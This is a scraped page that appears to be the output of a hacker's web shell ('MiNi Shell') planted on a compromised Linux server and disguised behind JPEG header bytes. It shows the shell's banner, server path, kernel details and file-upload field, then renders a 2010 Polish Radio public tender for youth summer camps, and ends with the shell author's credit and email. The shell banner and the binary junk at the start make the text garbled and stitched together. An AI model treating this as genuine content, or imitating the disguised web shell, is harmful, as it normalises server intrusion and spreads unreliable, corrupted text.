JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100517/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100517/125991-N-2010.html

<p class="kh_header"><b>Warszawa: Zorganizowanie obozów rekreacyjno - sportowych w kraju i zagranicą dla młodzieży - dzieci pracowników PR-S.A. (znak sprawy: DK/WPzp-37/10)</b><br>
<b>Numer ogłoszenia: 125991 - 2010; data zamieszczenia: 17.05.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Polskie Radio S.A. Dział Obsługi Zamówień Publicznych , Al. Niepodległości 77/85, 00-977 Warszawa, woj. mazowieckie, tel. 022 6459359, faks 022 6453959, 6455996.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.prsa.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zorganizowanie obozów rekreacyjno - sportowych w kraju i zagranicą dla młodzieży - dzieci pracowników PR-S.A. (znak sprawy: DK/WPzp-37/10).</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zadanie 1 
1.	Zorganizowanie obozu rekreacyjno-sportowego we Włoszech w miejscowości Rimini.
2.	Wiek dzieci: 15-19 lat.
3.	Czas trwania wypoczynku minimum 11 dni (łącznie z dniem wyjazdu i przyjazdu) w tym min. 8 noclegów w terminie pomiędzy 01.07.2010 r. a 17.07.2010 r..
4.	Przewidywana liczba uczestników około 50 osób.
5.	Zakwaterowanie w hotelu min.**, w pokojach 2-4 osobowych (bez łóżek piętrowych i dostawek) z pełnym węzłem sanitarnym, odległość od plaży max. 350 m.
6.	Zapewnienie: bazy rekreacyjno-sportowej, świetlicy, sali wyposażonej w TV. 
7.	Wyżywienie:
a)	w czasie pobytu: 3 posiłki dziennie: śniadanie, lunch, obiadokolacja, 1,5 litra dziennie wody do picia dla każdego uczestnika,
b)	w drodze powrotnej do Polski: suchy prowiant (na 2 dni), ciepły posiłek we Włoszech 
i w Polsce, 2 x 1,5 litra wody do picia dla każdego uczestnika.
8.	Program:
a)	rekreacyjno-sportowy,
b)	plażowanie i kąpiele,
c)	dyskoteki, gry i zabawy sportowe,
d)	zwiedzanie najbliższej okolicy,
e)	wycieczka autokarowa do Rzymu,
f)	wycieczka autokarowa do Wenecji,
g)	wycieczka do parku rozrywki Mirabilandia.
9.	Bilety wstępu związane z realizacją programu w cenie skierowania. 
10.	Opieka wykwalifikowanej kadry pedagogicznej(zgodnie z obowiązującymi przepisami prawa).
11.	Opieka ratownika z odpowiednimi uprawnieniami.
12.	Opieka pilota i rezydenta biura.
13.	Opieka medyczna zgodnie z wymogami wynikającymi z właściwych przepisów.
14.	Transport - autokar wysokiej klasy (klimatyzacja, barek, video, WC), do miejsca pobytu 
i z powrotem w sposób spełniający wymogi bezpieczeństwa.
15.	Ubezpieczenie uczestników: NNW, KL, bagaż.

 

Zadanie 2 
1.	Zorganizowanie obozu rekreacyjno-sportowego we Włoszech w miejscowości Rimini.
2.	Wiek dzieci: 15-19 lat.
3.	Czas trwania wypoczynku minimum 11 dni (łącznie z dniem wyjazdu i przyjazdu) w tym min. 8 noclegów w terminie pomiędzy 01.08.2010 r. a 15.08.2010 r.
4.	Przewidywana liczba uczestników: około 50 osób.
5.	Zakwaterowanie w hotelu min.**, w pokojach 2-4 osobowych (bez łóżek piętrowych i dostawek) z pełnym węzłem sanitarnym odległość od plaży max. 350 m.
6.	Zapewnienie: bazy rekreacyjno-sportowej, świetlicy, sali wyposażonej w TV. 
7.	Wyżywienie:
a)	w czasie pobytu: 3 posiłki dziennie: śniadanie, lunch, obiadokolacja, 1,5 litra dziennie wody do picia dla każdego uczestnika,
b)	w drodze powrotnej do Polski: suchy prowiant (na 2 dni), ciepły posiłek we Włoszech 
i w Polsce, 2 x 1,5 litra wody do picia dla każdego uczestnika.
8.	Program:
a)	rekreacyjno-sportowy,
b)	plażowanie i kąpiele,
c)	dyskoteki, gry i zabawy sportowe,
d)	zwiedzanie najbliższej okolicy,
e)	wycieczka autokarowa do Rzymu,
f)	wycieczka autokarowa do Wenecji,
g)	wycieczka do parku rozrywki Mirabilandia.
9.	Bilety wstępu związane z realizacją programu w cenie skierowania.
10.	Opieka wykwalifikowanej kadry pedagogicznej(zgodnie z obowiązującymi przepisami prawa).
11.	Opieka ratownika z odpowiednimi uprawnieniami.
12.	Opieka pilota i rezydenta biura.
13.	Opieka medyczna zgodnie z wymogami wynikającymi z właściwych przepisów.
14.	Transport - autokar wysokiej klasy (klimatyzacja, barek, video, WC), do miejsca pobytu 
i z powrotem w sposób spełniający wymogi bezpieczeństwa.
15.	Ubezpieczenie uczestników: NNW, KL, bagaż.

 
Zadanie 3

1.	Zorganizowanie obozu rekreacyjno-sportowego w Dziwnówku.
2.	Wiek dzieci: 14-18 lat.
3.	Czas trwania wypoczynku minimum 12 dni (łącznie z dniem wyjazdu i przyjazdu) w tym 11 noclegów w terminie pomiędzy 01.07.2010 r. a 20.07.2010 r.
4.	Przewidywana liczba uczestników około: 10 osób.
5.	Zakwaterowanie w ośrodku wypoczynkowym, pokoje 2-4 osobowe (bez łóżek piętrowych i dostawek) z pełnym węzłem sanitarnym.
6.	Zapewnienie bazy rekreacyjno-sportowej (boiska do gier zespołowych, świetlica, stołówka na terenie ośrodka, gry świetlicowe, wyposażenie obiektu w salę TV i salę dyskotekową).
7.	Wyżywienie - 3 posiłki dziennie: śniadanie, obiad + podwieczorek, kolacja oraz suchy prowiant w drodze powrotnej.
8.	Program:
a)	rekreacyjno-sportowy,
b)	plażowanie i kąpiele,
c)	zwiedzanie najbliższej okolicy,
d)	dyskoteki, karaoke, gry i zabawy sportowe,
e)	ogniska z pieczeniem kiełbasek.
9.	Bilety wstępu związane z realizacją programu w cenie skierowania.
10.	Opieka wykwalifikowanej kadry pedagogicznej(zgodnie z obowiązującymi przepisami prawa).
11.	Opieka ratownika z odpowiednimi uprawnieniami.
12.	Opieka medyczna zgodnie z wymogami wynikającymi z właściwych przepisów.
13.	Transport - autokar wysokiej klasy (klimatyzacja, WC), do miejsca pobytu i z powrotem w sposób spełniający wymogi bezpieczeństwa.
14.	Ubezpieczenie uczestników: NNW..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 55.24.00.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 01.07.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za spełniających warunek posiadania niezbędnej wiedzy i doświadczenia, Zamawiający uzna Wkonawców, którzy wykonali w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy, to w tym okresie, co najmniej cztery usługi polegające na organizacji krajowych i zagranicznych pobytów rekreacyjnych lub obozów rekreacyjno-sportowych dla dzieci i/lub młodzieży, przy czym łączna wartość wykazanych czterech usług nie może być mniejsza niż 100.000,00 złotych (PLN) brutto.
Ocena spełnienia powyższego warunku zostanie dokonana na podstawie dokumentów, wymienionych w pkt 8.1 SIWZ, według kryterium /spełnia/ nie spełnia/.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za spełniających warunek sytuacji ekonomicznej i finansowej Zamawiający uzna Wykonawców, którzy posiadają ubezpieczenie od odpowiedzialności cywilnej deliktowej - z tytułu prowadzenia działalności i posiadania mienia oraz odpowiedzialności kontraktowej - z tytułu niewykonania lub nienależytego wykonania zobowiązania na wymaganą minimalną sumę gwarancyjną 500.000 zł (słownie złotych: pięćset tysięcy) na jedno i wszystkie zdarzenia w okresie ubezpieczenia w odniesieniu do OC deliktowej i 500.000 zł (słownie złotych: pięćset tysięcy) na jedno i wszystkie zdarzenia w okresie ubezpieczenia w odniesieniu do OC kontraktowej.
Ocena spełnienia powyższego warunku zostanie dokonana na podstawie dokumentów, wymienionych w pkt 8.1 SIWZ, według kryterium /spełnia/ nie spełnia/.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>8.3.1 wypełniony /Formularz oferty/ na załączniku nr 2 do SIWZ;
8.3.2 w przypadku, gdy ofertę w imieniu wykonawcy podpisuje pełnomocnik, do oferty należy załączyć pełnomocnictwo (w oryginale lub uwierzytelnionym notarialnie odpisie) określające jego zakres i podpisane przez osoby uprawnione do reprezentacji wykonawcy;</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 40</li>
<li>2 - czas trwania wypoczynku, tj. liczba dni - 60</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zmiany niniejszej Umowy w stosunku do treści oferty bez zwiększania jej wartości są dopuszczalne pod warunkiem, ze zmiany te są konieczne dla prawidłowej realizacji przedmiotu zamówienia, a ponadto nie wprowadzenie tych zmian narażałoby Zamawiającego na szkodę lub utrudniałoby jego prawidłowe funkcjonowanie lub uniemożliwiałoby realizację jego statusowych zadań.
2. Zmiana treści umowy z uwzględnieniem treści ust. 1 będzie miała miejsce w szczególności w przypadku wystąpienia następujących okoliczności:
1) zmiany nazw podmiotów będących stronami niniejszej Umowy,
2) zmiany w zakresie obowiązujących przepisów prawa, w tym podatku VAT.
3. Zmiana postanowień niniejszej umowy wymaga zachowania formy pisemnej pod rygorem nieważności.
4. Poza przypadkami przewidzianymi w Umowie i przepisach Kodeksu cywilnego, Zamawiający może także odstąpić od Umowy w razie wystąpienia istotnej zmiany okoliczności, powodującej, że wykonanie Umowy nie leży w interesie publicznym, czego nie można było przewidzieć w chwili jej zawarcia. Odstąpienie od Umowy z tego tytułu może nastąpić e terminie 30 dni od dnia powzięcia wiadomości o powyższych okolicznościach. W takim przypadku Wykonawca może żądać jedynie wynagrodzenia należnego mu z tytułu wykonania części Umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.prsa.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> PR-S.A. al. Niepodległości 77/85, 00-977 Warszawa, pok. 320 piętro III (stary budynek) od pon. do pt. w godz. 8:00-16:00.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.05.2010 godzina 11:45, miejsce: PR-S.A. al. Niepodległości 77/85, 00-977 Warszawa, skrzynka w holu (stary budynek) oznaczona : Przetarg na zorganizowanie obozów rekreacyjnych ...etc(znak sprawy: DK/WPzp-37/10).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zorganizowanie obozu rekreacyjno - sportowego we Włoszech w Rimini.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie 1 
1.	Zorganizowanie obozu rekreacyjno-sportowego we Włoszech w miejscowości Rimini.
2.	Wiek dzieci: 15-19 lat.
3.	Czas trwania wypoczynku minimum 11 dni (łącznie z dniem wyjazdu i przyjazdu) w tym min. 8 noclegów w terminie pomiędzy 01.07.2010 r. a 17.07.2010 r..
4.	Przewidywana liczba uczestników około 50 osób.
5.	Zakwaterowanie w hotelu min.**, w pokojach 2-4 osobowych (bez łóżek piętrowych i dostawek) z pełnym węzłem sanitarnym, odległość od plaży max. 350 m.
6.	Zapewnienie: bazy rekreacyjno-sportowej, świetlicy, sali wyposażonej w TV. 
7.	Wyżywienie:
a)	w czasie pobytu: 3 posiłki dziennie: śniadanie, lunch, obiadokolacja, 1,5 litra dziennie wody do picia dla każdego uczestnika,
b)	w drodze powrotnej do Polski: suchy prowiant (na 2 dni), ciepły posiłek we Włoszech 
i w Polsce, 2 x 1,5 litra wody do picia dla każdego uczestnika.
8.	Program:
a)	rekreacyjno-sportowy,
b)	plażowanie i kąpiele,
c)	dyskoteki, gry i zabawy sportowe,
d)	zwiedzanie najbliższej okolicy,
e)	wycieczka autokarowa do Rzymu,
f)	wycieczka autokarowa do Wenecji,
g)	wycieczka do parku rozrywki Mirabilandia.
9.	Bilety wstępu związane z realizacją programu w cenie skierowania. 
10.	Opieka wykwalifikowanej kadry pedagogicznej(zgodnie z obowiązującymi przepisami prawa).
11.	Opieka ratownika z odpowiednimi uprawnieniami.
12.	Opieka pilota i rezydenta biura.
13.	Opieka medyczna zgodnie z wymogami wynikającymi z właściwych przepisów.
14.	Transport - autokar wysokiej klasy (klimatyzacja, barek, video, WC), do miejsca pobytu 
i z powrotem w sposób spełniający wymogi bezpieczeństwa.
15.	Ubezpieczenie uczestników: NNW, KL, bagaż..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.24.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.07.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 40</li>
<li>2. czas trwania wypoczynku, tj. liczba dni - 60</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zorganizowanie obozu rekreacyjno - sportowego we Włoszech w miejscowości Rimini.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie 2 
1.	Zorganizowanie obozu rekreacyjno-sportowego we Włoszech w miejscowości Rimini.
2.	Wiek dzieci: 15-19 lat.
3.	Czas trwania wypoczynku minimum 11 dni (łącznie z dniem wyjazdu i przyjazdu) w tym min. 8 noclegów w terminie pomiędzy 01.08.2010 r. a 15.08.2010 r.
4.	Przewidywana liczba uczestników: około 50 osób.
5.	Zakwaterowanie w hotelu min.**, w pokojach 2-4 osobowych (bez łóżek piętrowych i dostawek) z pełnym węzłem sanitarnym odległość od plaży max. 350 m.
6.	Zapewnienie: bazy rekreacyjno-sportowej, świetlicy, sali wyposażonej w TV. 
7.	Wyżywienie:
a)	w czasie pobytu: 3 posiłki dziennie: śniadanie, lunch, obiadokolacja, 1,5 litra dziennie wody do picia dla każdego uczestnika,
b)	w drodze powrotnej do Polski: suchy prowiant (na 2 dni), ciepły posiłek we Włoszech 
i w Polsce, 2 x 1,5 litra wody do picia dla każdego uczestnika.
8.	Program:
a)	rekreacyjno-sportowy,
b)	plażowanie i kąpiele,
c)	dyskoteki, gry i zabawy sportowe,
d)	zwiedzanie najbliższej okolicy,
e)	wycieczka autokarowa do Rzymu,
f)	wycieczka autokarowa do Wenecji,
g)	wycieczka do parku rozrywki Mirabilandia.
9.	Bilety wstępu związane z realizacją programu w cenie skierowania.
10.	Opieka wykwalifikowanej kadry pedagogicznej(zgodnie z obowiązującymi przepisami prawa).
11.	Opieka ratownika z odpowiednimi uprawnieniami.
12.	Opieka pilota i rezydenta biura.
13.	Opieka medyczna zgodnie z wymogami wynikającymi z właściwych przepisów.
14.	Transport - autokar wysokiej klasy (klimatyzacja, barek, video, WC), do miejsca pobytu 
i z powrotem w sposób spełniający wymogi bezpieczeństwa.
15.	Ubezpieczenie uczestników: NNW, KL, bagaż..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.24.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.08.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 40</li>
<li>2. czas trwania wypoczynku, tj. liczba dni - 60</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zorganizwoanie obozu rekreacyjno - sportowego w Dziwnówku.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Zorganizowanie obozu rekreacyjno-sportowego w Dziwnówku.
2.	Wiek dzieci: 14-18 lat.
3.	Czas trwania wypoczynku minimum 12 dni (łącznie z dniem wyjazdu i przyjazdu) w tym 11 noclegów w terminie pomiędzy 01.07.2010 r. a 20.07.2010 r.
4.	Przewidywana liczba uczestników około: 10 osób.
5.	Zakwaterowanie w ośrodku wypoczynkowym, pokoje 2-4 osobowe (bez łóżek piętrowych i dostawek) z pełnym węzłem sanitarnym.
6.	Zapewnienie bazy rekreacyjno-sportowej (boiska do gier zespołowych, świetlica, stołówka na terenie ośrodka, gry świetlicowe, wyposażenie obiektu w salę TV i salę dyskotekową).
7.	Wyżywienie - 3 posiłki dziennie: śniadanie, obiad + podwieczorek, kolacja oraz suchy prowiant w drodze powrotnej.
8.	Program:
a)	rekreacyjno-sportowy,
b)	plażowanie i kąpiele,
c)	zwiedzanie najbliższej okolicy,
d)	dyskoteki, karaoke, gry i zabawy sportowe,
e)	ogniska z pieczeniem kiełbasek.
9.	Bilety wstępu związane z realizacją programu w cenie skierowania.
10.	Opieka wykwalifikowanej kadry pedagogicznej(zgodnie z obowiązującymi przepisami prawa).
11.	Opieka ratownika z odpowiednimi uprawnieniami.
12.	Opieka medyczna zgodnie z wymogami wynikającymi z właściwych przepisów.
13.	Transport - autokar wysokiej klasy (klimatyzacja, WC), do miejsca pobytu i z powrotem w sposób spełniający wymogi bezpieczeństwa.
14.	Ubezpieczenie uczestników: NNW.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.24.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.07.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 40</li>
<li>2. czas trwania wypoczynku, tj. liczba dni - 60</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com